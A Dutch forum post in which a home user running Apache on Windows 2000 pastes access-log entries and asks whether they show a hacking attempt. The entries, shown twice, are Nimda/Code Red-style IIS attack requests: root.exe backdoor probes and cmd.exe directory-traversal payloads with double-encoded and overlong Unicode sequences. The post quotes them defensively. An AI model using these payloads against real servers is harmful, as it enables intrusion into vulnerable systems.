Ik heb sinds een paar dagen een apache webservertje draaien op mijn w2k servertje (achter kabel modem).
Nou bekeek ik even de apache logs en kwam ik het volgende tegen:
"GET /scripts/root.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:05:51 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:05:59 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:06 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:14 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:22 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:30 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:37 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:47 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
is dit een poging geweest om iets te hacken?
Volgens mij heb ik alles wel goed afgeschermd, maar hoe kan ik testen of dat ook echt zo is??
Nou bekeek ik even de apache logs en kwam ik het volgende tegen:
"GET /scripts/root.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:05:51 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:05:59 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:06 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:14 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:22 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:30 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:37 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
*IP-adres* - - [08/Dec/2001:07:06:47 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 288
is dit een poging geweest om iets te hacken?
Volgens mij heb ik alles wel goed afgeschermd, maar hoe kan ik testen of dat ook echt zo is??